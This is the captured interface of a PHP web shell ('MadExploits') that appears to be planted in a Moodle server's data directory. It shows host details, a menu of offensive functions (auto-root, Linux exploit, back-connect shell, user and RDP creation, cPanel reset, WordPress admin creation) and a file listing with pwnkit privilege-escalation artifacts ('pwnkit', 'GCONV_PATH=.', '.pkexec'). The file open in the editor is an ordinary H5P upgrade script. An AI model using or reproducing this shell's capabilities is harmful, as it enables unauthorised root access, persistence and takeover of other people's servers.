Linux moodl-moodle-3s8bw1nuh5yqd9-5b875fdd66-8hs4m 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64
Apache/2.4.41 (Ubuntu)
: 10.39.0.36 | : 10.36.0.0
Cant Read [ /etc/named.conf ]
7.4.3
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
moodledata /
filedir /
c7 /
75 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
c7755bfe4d242c5197e1546722f1cc...
1.41
KB
-rw-rw-rw-
c775cf3e409c9e395a45e20453a37e...
2.07
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : c7755bfe4d242c5197e1546722f1cc020ff10590
var H5PUpgrades = H5PUpgrades || {}; H5PUpgrades['H5P.Column'] = (function () { return { 1: { /** * Asynchronous content upgrade hook. * Upgrades content parameters to support Column 1.10. * * - Converts H5P.AppearIn to H5P.AdvancedText * * @param {Object} parameters * @param {function} finished */ 10: function (parameters, finished) { if (parameters && parameters.content) { // Go through content for (var i = 0; i < parameters.content.length; i++) { if (parameters.content[i] && parameters.content[i].content) { const content = parameters.content[i].content; if (content.library && content.library.split(' ')[0] === 'H5P.AppearIn') { content.library = 'H5P.AdvancedText 1.1'; content.params = content.params || {}; let roomName = ''; if (content.params.appearRoom) { roomName = content.params.appearRoom; } content.params.text = '<p>AppearIn support for embedded rooms has been deprecated and is no longer maintained. Access your room in a new tab with the following <a target="_blank" href="https://appear.in/' + roomName + '">link.</a></p>'; } } } } // Done finished(null, parameters); } } }; })();
Close